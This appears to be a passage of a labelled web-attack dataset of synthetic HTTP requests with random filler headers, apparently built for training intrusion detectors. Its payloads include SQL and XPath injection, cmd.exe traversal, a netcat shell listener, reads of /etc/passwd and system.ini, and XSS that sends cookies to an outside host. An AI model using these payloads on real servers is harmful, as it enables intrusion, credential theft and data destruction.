class: XPathInjection
GET /96LXmJsbinmail1mZdivn/rr2ia9geAaNdtEksrlLe/c2qHjg1TV/5MTn0sWHcFtMK3MwOV/B5nthe/tmpormsOKT5HstdinRqla/9@NQBNOcu/tU7rNFaiOGImE/StWNwQ/eefiSa6.htm? HTTP/1.1
Host: 204.77.11.215:80
Connection: rmordxnt
Accept-Charset: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=6799
Cookie: aofhld=s9qzCyoe'  or 6   < count(path/child::*)  or 'sh3tRpEi' =    ';group byYiL=iatrIndaseokn;wenyhupF=%epnsrdvwcnvs;xp_select3dZf5ERRo1=iXR3;yMG-U=m4ilhetcwcaroseiz
If-Range: *
Max-Forwards: 62
Pragma: no-cache
Referer: http://www.eoUvhere.fr/elhiam/Ht0hocrd.exe
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.7; ua-Ut; rv:5.0.6) Gecko/74319074

null

End - Id: 48463
Start - Id: 49611
class: XPathInjection
GET /vsuj6uOxiw/Eiframe4/euXNycpZ0ERskEv/rw_ARiIUjaDU@mHHm4r7.php3?VszB0imgd0=68526&n1lndticoae8A=66501625&vustcge=4&dataaosidv=Dtlo%29s9&ianOih3Eitmm=aZT63Xc&EAOebiqfe0t=erm%2Fs%2Fe9vti%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D9%5D+%7C++ezb7a%2FcvtSyl%2Fg9%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D483%5D++++or+%27v5rt%27+++%3D+%27 HTTP/1.1
Host: www.tuqbN.be:80
Connection: es3bc1m
Accept: application/*
Accept-Charset: iso-8859-15, cp-936;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="4"
Date: Mon, 12 Jun 06 02:53:37 UTC
ETag: W/"baj@.7Mq2NB-WyuTN"
Expect: 100-continue
From: b3Tsmet@oiiienq.de
If-Modified-Since: Fri, 18 Mar 05 11:06:54 UTC
If-Unmodified-Since: Thu, 06 Jul 06 01:15:28 GMT
If-Match: "T.1cbwN9_jWIQdxk"
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 2537
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic MXlsUnRsbzpqZWFvb1kz
Authorization: NTLM NGhybm1TdG5tbm5lZXJJc2RzYWV0aXRlUXJjbzRBY3Q4bnNPZXZ1
Range: 7852-
Referer: http://www.c8plpIe.de/iadbi/eefsamh/inenaU.conf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 2.6; se-no; rv:3.0.9) Gecko/61750899
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 0.2 www.Sdwie.jpeg, 0.9 www.atittal.jpeg, jaRAw/6.4 204.122.228.249:3
Transfer-Encoding: identity
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49611
Start - Id: 43817
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.sgnripe.cz:80
Connection: keep-alive
Accept: application/*, application/*
Accept-Charset: shift_jis;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.9
Cache-Control: max-age=98
Client-ip: 114.105.127.17
Cookie: 1jnidhnhicohcla=au|;tcew6sp=518477;aee=rrwxld;Eq1D=tlQZs3SyzA
Cookie2: $Version="513"
Date: Wed, 05 Jul 06 05:33:09 GMT
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: cw3btxir@daeQnmosye.biz
If-Modified-Since: Mon, 08 Aug 05 14:15:59 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 979
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Digest opaque="aias"
Range: 7246-,-7950
Referer: /1ode6sG/dJeooe.txt
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 7.8; 8o-ip; rv:9.2.3) Gecko/26468032
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 0.7 www.itme.htm
Transfer-Encoding: gzip
Upgrade: p3d/0.6, 4skh4H/9.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 055444693738
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43817
Start - Id: 40587
class: SSI
GET /x2x0@XMe.exKbtO/rmyPQNT/ox53tMods/netcatWU/15tEG1@Zlsd0/Z8Pmyid_3Ny5/eeaegYItNyoce.jpeg?lwsmar7mldrm=%3C%21--++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&eyBtrritqmlo2t=suulAoeothhitm&s0nfbh=rhdhmbEEsp8Pt9&nor=%29ntn HTTP/1.0
Host: www.in5Ojdo.de
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, x-mac-cyrillic;q=0.8, koi8-r;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 25.93.112.146
Cookie: 8a1ores=259336813;aeUe=280;h4ifces=oihtaccesh;mgttenwN=08;ylshagdm=zbncawonastt;mtmtmi=72
Cookie2: $Version="623"
Date: Sun, 22 Feb 04 13:57:51 GMT
ETag: "zdGi061DCGw2vaWv2"
Expect: 100-continue
From: tiotlhOg@Ee0em4sr8.gov
If-Modified-Since: Fri, 05 Mar 04 01:59:03 GMT
If-Unmodified-Since: Thu, 31 Jul 08 14:54:06 CET
If-Match: *
If-None-Match: "@pefRWElU7Nor5u0HBt"
If-Range: Thu, 08 Jan 04 15:29:55 UTC
Max-Forwards: 224
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM YWhlYXFlbmhuY2U4aHlhdGxOZWk1ZGVtdG91QTVsMXJycWVtZWRmZTFoNG9sTnI=
Authorization: NTLM dGhvSHFvYWFydEF4dXJ0QWF0ZXBucnRiN2lpbXNIbEx5
Range: 9102-264,3606-,-14
Referer: /ueibh/80dour/ojiu9sIn/s4iu.pl
TE: gzip,gzip;q=0.0,trailers
Trailer: If-None-Match
User-Agent: asdrh2Pdmhtla
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 972x7445
Via: FTP/5.0 170.147.249.197, HTTP/8.5 www.wtDh.shtml:57012, HTTP/4.8 155.103.69.226
Transfer-Encoding: compress
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 163.253.181.70
X-Serial-Number: 69115
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40587
Start - Id: 43384
class: OsCommanding
GET /raF21nwHdpz/e7ithlhtmes6yt/edosnlI/dl9ooicno4o5Gu/dCxI7eEWPTgoXob/sh_49S7MT/9heratlr/hUn5SzODyqfromiT7X/le/cr7sh.gif?weeito=j9CNTVSCOPH&KstituT41e2fi=jrlep&1hfschotcXrt=wuwse&lwe1al=%3Dieer%7Erve+162%26having+de%3Dp&smni3da=do-+niyL&llfesgy=8todrerurha&esie=hfxpV&eah=rX%406px&_cmdLrNnull7=608&prn7t=ase&aEsrhoso=8735154289&i8=3858&Sni9k=tmugrcp3+qhc0L&iortiiao2e1ae=%7C++++cat+++%2Fetc%2Fpasswd+%7C&oeynyEks=%3Evexecstsluthrtsa+t+or+ HTTP/1.1
Host: www.reexe.be
Connection: cd1jtm
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate, compress;q=0.8, compress
Accept-Language: *;q=0.9
Cache-Control: tale=gR7OeNc
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Mon, 03 Sep 07 14:37:45 UTC
ETag: W/"oThLttcItnH6jh1_m"
Expect: a2s3toh=auieoceh
From: no4b@rasantepan.ch
If-Modified-Since: Sun, 13 Jan 08 04:12:33 CET
If-Unmodified-Since: Mon, 17 Aug 09 06:44:39 GMT
If-Match: "J6Tl_jXgltnfTMX"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic OGlldnM6aW5vdA==
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 233-,3-70638,78-7879
Referer: http://www.eIdea.be/rytded.mp3
TE: deflate,trailers
Trailer: Upgrade
User-Agent: 0T06t/6.2.8
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9788x122
Via: 5.5 www.8ramrcoN.png, 1eme/7.4 57.108.71.68
Transfer-Encoding: deflate
Upgrade: ehie/7.0, fyH/5.8, phx/0.7, t9e/1.5, u9Dar/1.3
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 48.60.80.114
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43384
Start - Id: 35153
class: SqlInjection
PUT /gecs/p0XWy/ftht6aNlireccgfde.pl? HTTP/1.0
Content-Length: 204
Content-Language: b,o
Content-Encoding: identity
Content-Location: /t74sr/antern.jpeg
Content-MD5: cklyb3NmZXlpcmV0ZWQyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Mon, 19 Mar 07 15:29:21 GMT
Host: www.qhmaslpnf.com:6
Connection: ewi2ihb
Accept: application/postscript, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="7"
Date: Sat, 09 Feb 08 01:38:15 CET
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Fri, 14 May 04 19:16:40 GMT
If-Match: "BvTlhRmiEhwSvAAZVs"
If-None-Match: "u_-FpeQ88Tdlu8tXA6"
If-Range: "8C0Af7r6zKkvRJKdo"
Max-Forwards: 97
MIME-Version: 8.9
Pragma: xhii=eiruea
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest username="t66nbee"
Range: -960786
Referer: /eltdiess/iotm7O.cgi
TE: deflate
Trailer: Host
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 0.2; hn-wq; rv:6.9.1) Gecko/00573773
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: uBbxs; so5aezf5=6wWka4p
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 795 202.58.110.230 "nyEakndeio" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a0ctcnIg=Atssirnull&Z9bgsoundGandvbscriptwC6=1&yBvteinle=64&objectbTqechoD=on9i'    );DELETEFROMusersWHEREupper(username) =   upper( 'admin&2evoeeeVeuAxtet=shsdeci2fct1elsE&1_uC.yd=8674010

End - Id: 35153
Start - Id: 44041
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.wf7t.st:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: teec='alSs'
Client-ip: 199.92.23.73
Cookie: iLatApTcot=26621;a2eOorjns=ltelnet2o5;rideY9=otehOi;msdEioterai4onM=Rioos;xre5fhaieaamE=/e/j ata
Cookie2: $Version="4"
Date: Tue, 26 Dec 06 02:25:37 GMT
ETag: "eRN9igiQRHhLenNQ"
Expect: ehwes=nuc4cz
From: 6aep@Eebnu.org
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Thu, 10 Jul 08 06:11:38 GMT
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic YWtFd25wOmtoYW8=
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /psinn/5enkI5/5nemlo/reo7eRtL/Ondmtae1.sh
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 8.4; Vn-o5; rv:5.5.3) Gecko/88924535
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: 6.7 151.240.242.79:1499, FTP/5.5 www.enRa.tiff
Transfer-Encoding: identity
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44041
Start - Id: 42842
class: OsCommanding
GET /insertZYdvWjDV5YOlibjR/ohpohor.cgi?xehs=stgroup+byvcTht&QFacceptdvarleJ=%7C+++shell%28++++%22cmd+++%2Fc+++++c%3AInetpubwwwrootMSISSnc.exe+++++-l++-p+7475++++-t+++-e++++cmd.exe++%22++++%29+++%7C++++%27&tcndeslefoe1a=p4nxopen&flZhd=wrtaru%3A&rtitnl=dKpJkKb&dhceS=e&aTdrnrt=aIV&Sihsii=lafEre%3Egaji%3F&nhzstdohlabiGln=3663070&DCReUEIuY=5378&exectSUl62T=iof%40k%40ajDH&6Ynttdmiertsme=ne7+%5DtGujEoyh&wOB84x=th2eearzaesmeue&aXewatdfhoatoi=16233 HTTP/1.1
Host: 173.11.130.29
Connection: omdoAnOs
Accept: text/*, application/rtf
Accept-Charset: macintosh, windows-1258, big5;q=0.2, x-mac-arabic;q=0.1
Accept-Encoding: identity;q=0.4, gzip;q=0.4, compress, identity;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 167.171.91.101
Cookie: edohrnebl9ct1n=Art
Cookie2: $Version="71"
Date: Wed, 09 Jan 08 20:55:02 CET
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Tue, 20 Sep 05 24:59:05 GMT
If-Unmodified-Since: Thu, 26 Feb 04 22:06:48 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 10 Jun 04 19:39:53 CET
Max-Forwards: 113
MIME-Version: 7.9
Pragma: EsNriea='9S'
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: http://www.fn0ted.net/el6kgt/teseapbl/gztw0es/3ebR.mdb
TE: gzip,chunked;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/1.0 (compatible; zlpet; SunOS sun4u; tENita4; 5fsb4Nva)
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color8
Via: 0.7 212.160.95.7:2087, FTP/1.3 229.192.98.243, 9.7 www.rn4b.html
Transfer-Encoding: nAff
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 976 www.eguwaq.html "ahcm" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 517314
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42842
Start - Id: 49189
class: XPathInjection
GET /6shtf1muyfuni2/qtoF5doeIenw/0xAD0YkPy.KR/3VXXHlibKu57acceptxmail9.nsf?lufhdotemr=p.qdZU&miehdn4ihiin=3qmhieo%27++or+++1%3C+++yb%2Frt%2Fm%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+or+++++%27ngrfdvr%27++%3D+++%27&2n=aW%40wxoHP&Pb9Y_Egv=6067611&l7nic4ole=rmaEdlGs2fei&dsnwrm7nrC47yc=2St&nCehhiaisdrt=hust71ro HTTP/1.0
Host: 121.7.52.204
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, cp-936;q=0.1, cp-950;q=0.1, big5;q=0.1
Accept-Encoding: deflate, deflate;q=0.7, identity
Accept-Language: *;q=0.3
Cache-Control: max-age=678
Client-ip: 69.65.142.204
Cookie: nctorhe=SnCintEEyHowhrluzo
Cookie2: $Version="8"
Date: Sun, 23 Aug 09 03:31:17 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: oSmxlt
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Thu, 17 Nov 05 05:04:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 4160
MIME-Version: 7.4
Pragma: odoa=ho
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: NTLM TmVhZWNyaTJvOWJBdWFhOTdwVXdzMUtjY3VzZTVncnM3cWU=
Range: 87-,-69535,7135-70843
Referer: http://lnhx.st/klLk/esht/wxtt5htx.php3
TE: trailers,deflate;q=0.6
Trailer: Accept
User-Agent: iM09-19 http://www.eekiio.be
UA-CPU: x86
UA-Disp: 809,4297,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: 2.2 44.143.124.119
Transfer-Encoding: identity
Upgrade: 1iqlLr/6.5, tlii/7.8, eetsh6/1.2, xr2f/8.0, jok/4.0
Warning: 186 110.57.33.198 "wcete" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49189
Start - Id: 49337
class: XPathInjection
GET /vlwdfbgngyo/h6XUjdaRTKwMjZ_wxZ/fzvVItOqKk2tofgxG8/H2R43h/Wseo/gdb3o2euTvhR/EEdinanaoeez/PH1fOhasystemuKkLZ9/2BYqAmTrnydGC/a6lk50LsfVAw.NGd8GVi/GFw6hgHVR7shutdownCe.shtml?Nqxssmzaer9ue=nelm0&onsglX=%24dt&pu0i1gtstnhaa=7908673&6tpdnAwnruesdSm=agEasaWeo&bgsounddnxX=elrtj&nph-R87jQ=accept2rmtbtcrejH&tvdfby7sigt0oa1=svv7oe5ua%3E&7u=04224152&eomhlp7dp=e6i%7C4bbleydt&HvbscripthyN1betweenEP=oft%26nnrcpd%24libl1z6%3Fo%3F&easoontrcro5mlU=hJaO%2F3%2FhgNn%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D66%5D+++%7C+iiaHl%2F0e%2FmiuuAa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D++++or+++++%2707nae%27++%3D+++%27&0Hwindow.opent@qSHLJPN=83355 HTTP/1.0
Host: www.mAfmio.com:80
Connection: t8nohmh
Accept: */*
Accept-Charset: x-mac-roman, cp-950
Accept-Encoding: 
Accept-Language: ytn-sw, driiuna-o9grF;q=0.4, no-jchS
Cache-Control: only-if-cached
Client-ip: 22.165.123.172
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="889"
Date: Sun, 14 Feb 10 14:42:35 CET
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: nlurIti
From: 5sny@toesr.uk
If-Modified-Since: Thu, 02 Aug 07 12:51:41 CET
If-Unmodified-Since: Sun, 10 Jul 05 04:00:03 UTC
If-Match: "wkIHvyXQR61ssp4j"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: Sat, 29 Aug 09 15:43:43 CET
Max-Forwards: 8
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM dGVlbW9wNWVvd21temR0cmFOaG5lSVNUbGx0bU9tb2hlbA==
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /spts9u8r/wo0Osl7.gif
TE: trailers,gzip;q=0.9,trailers
Trailer: From
User-Agent: bqmM5 (o3xukVCPT; kLWD@TA)
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 953x2070
Via: 6.3 www.engtnhd.jpeg
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49337
Start - Id: 42366
class: SqlInjection
GET /s-Yzl32/ny4q1-T9wfP3.png?siu=%3B++++EXEC%28+++%27INS%27%2B%27ERT+++INTO+++users++++values%2858837%2C%27nrne%27%2C%27ke%27++%29%29 HTTP/1.1
Host: www.nn6nlmto.de:44
Connection: ipesyeke
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uzowC5uq-b
Cache-Control: max-age=18
Client-ip: 6.250.155.154
Cookie: gpigaOuleedE=46311733
Cookie2: $Version="88"
Date: Sun, 06 Feb 05 08:16:54 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Mon, 11 Oct 04 05:14:58 CET
If-Unmodified-Since: Thu, 31 Aug 06 10:02:40 UTC
If-Match: "HRbjLuXUrTP8@8DRMN"
If-None-Match: *
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 272
MIME-Version: 2.3
Pragma: diScxtij=Eoehkpr
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Digest opaque="etieea"
Range: -966,396-333,-3990
Referer: http://neeauiEp.cz/yr2rte/lesaa3/osige.jpg
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: hTer/2.1
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x018
Via: 0.9 24.65.139.68, HTTP/5.3 106.15.140.9
Transfer-Encoding: deflate
Upgrade: ptai/1.8, nrw/3.3, 5vdio/0.4, eol/0.5, rtemsh/1.9
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 222.98.17.178
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42366
Start - Id: 45445
class: PathTransversal
GET /To2.mspx?I0M.4TH5.1=l%3Anode&Ets6Isne7104slm=7&ezrldt14=pNVxp_eGetgsdt%3F&3ueolv0hh7aRei=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&olp7eW=ehm%26l8&ef8EesxeSfd=9&awertsolefo=s&7e0d1cZiprsm=aSElV3POvXA9&1su3lCHexecQ2sr=oq.1cVNrSh&F3potiDniS=Lnmochab&sgfo=1pat1Ienadminsmra&7WVhomeuhtimo=38192084&n28naq=oEashqenlas HTTP/1.0
Host: www.0Eio.be
Connection: close
Accept: video/mpeg, audio/basic;q=0.3
Accept-Charset: windows-874
Accept-Encoding: deflate, deflate;q=0.5, compress, compress
Accept-Language: *
Cache-Control: r='h'
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="04"
Date: Thu, 05 Apr 07 07:39:35 CET
If-Modified-Since: Sun, 16 May 04 05:32:34 GMT
If-Match: *
If-None-Match: "8_ctXRlnCKINx16eiKrq"
If-Range: "LMZywkUJ-bxFU3gyHd@Q"
Max-Forwards: 4
Pragma: sunhahaa=bie
Authorization: ol8si b5aft=hhohnl
Referer: /penhwod.cgi
TE: deflate
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 6.0; dn-se; rv:3.4.7) Gecko/20835664
Via: etha6/3.0 238.84.73.164, pgohn/4.6 www.evawdcnw.tiff
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
X-Forwarded-For: 176.191.17.103

null

End - Id: 45445
Start - Id: 45366
class: PathTransversal
POST /zHCtrQGYqY5GCYXx/mghckshsoxh/nrssyosa/n6@5x9xO/d4AZIRfVpf90H2A1q/tAxTJrNAx52O@W2u/r9eds/doWloejtru6uf/iBSlocationujx8w.aspx? HTTP/1.1
Content-Length: 285
Content-Language: meidc,iTtxitac,de
Content-Encoding: gzip
Content-Location: http://wttl.org/mgebecI/wAene/Dalnt/ear9.php4
Content-MD5: Zjd0SG5ZejJvaGFObG9kcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Sep 09 06:28:25 CET
Last-Modified: Wed, 07 May 08 15:41:40 CET
Host: 229.84.68.222
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.1, euc-jp;q=0.1, iso-8859-1, koi8-r, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 45.42.189.117
Cookie: seNgsuctstazet= 2 ;e9z=scriptsyav znf;cois=62593119;replaceccJlikeY=2107424111;lt=cQNElKBKr;ZyY8ya8GzRi=9
Cookie2: $Version="0"
Date: Tue, 30 Jun 09 22:56:55 UTC
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Fri, 21 Apr 06 15:07:50 CET
If-Unmodified-Since: Tue, 20 Jul 04 05:38:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 07 Dec 07 18:57:02 UTC
Max-Forwards: 33
MIME-Version: 9.2
Pragma: nir=y3reici
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: otor7 orgso=hnot1E
Range: 53-,6570-433377,-5771
Referer: http://YEoyni.ch/42ydstn0/tPts5jho/waUtosaj/rt0aE/nree28.swf
TE: trailers,gzip;q=0.4
Trailer: Referer
User-Agent: ajErifse9d
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 441x030
Via: FTP/0.0 43.195.230.120, 3.4 www.b3Natewo.css, FTP/4.3 www.oivt.jpeg:52
Transfer-Encoding: identity
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a3smisnhaBdsy=enAtdEDnnshezW&PGlG5=aowtean2es&1HwinntsfQ1dP7L=y&dnTw0rafiop=4017780&7aolhpceir=p&eeCmae2n=a4object~?w9eju&eeskEeo8ihnsX=oygb&oecltaC=..\..\..\..\WINDOWS\system.ini&Wwzo261i=l9$ce&sjgepnrkNTi=938&nntrjmse=eeeadh8ntLahmlwidA&o8DOluhtdiy=snkfrbJmdA0tpRrods

End - Id: 45366
Start - Id: 46600
class: XSS
GET /swg0mLoL1k/7Sc1Yyh/aOJQY0Enzmi8MxYsh/tVV7GDEQ9VZ-XNRIPcY.js?mcaronhsebh=91935017&6vwn=y4l&V793=tty&d0nufwcl7=kne&6sIELIIRF=s6clresemtvroo&5bannHe=eYeo%40tq&esEze=997&pcatQR1JrPOw3Y=tfo%27a&Zc5rhlinkGftelnet=eRU&oeu3t7aactsqtes=awere HTTP/1.0
Host: www.opdagsweoj.uk
Connection: keep-alive
Accept: video/quicktime;q=0.8, application/postscript
Accept-Charset: x-mac-cyrillic;q=0.3, euc-kr;q=0.5, windows-1258;q=0.1, hz-gb-2312;q=0.8, x-mac-japanese;q=0.0
Accept-Encoding: <a     href    =  " javas&#99;ript&#35;[alert   ('iz4ogWOa');]   "  >
Accept-Language: <a    href="     javas&#99;ript&#35;[document.location.replace    ('http://www.iclisial.com/cgi-bin/asaratti.cgi'+document.cookie);]    " >
Cache-Control: no-transform
Client-ip: 85.69.51.81
Cookie: oyjeNilabsexds=78642;a0ueonh6g=dwOqen9ame5iao;nte25rSbnt9usa=ur
Cookie2: $Version="8"
Date: Mon, 23 May 05 12:23:03 GMT
ETag: "9zn7eT01akETkZC"
Expect: 100-continue
From: dAmNr@octimiksy.gov
If-Modified-Since: Wed, 07 Apr 10 24:18:11 GMT
If-Unmodified-Since: Sun, 07 May 06 16:07:36 UTC
If-Match: *
If-None-Match: "5szCHTPw3wo6P4h64HL"
If-Range: Wed, 13 Jul 05 17:39:03 UTC
Max-Forwards: 287
MIME-Version: 3.4
Pragma: Rf0ee=tccst
Proxy-Authorization: Digest algorithm=mtihf
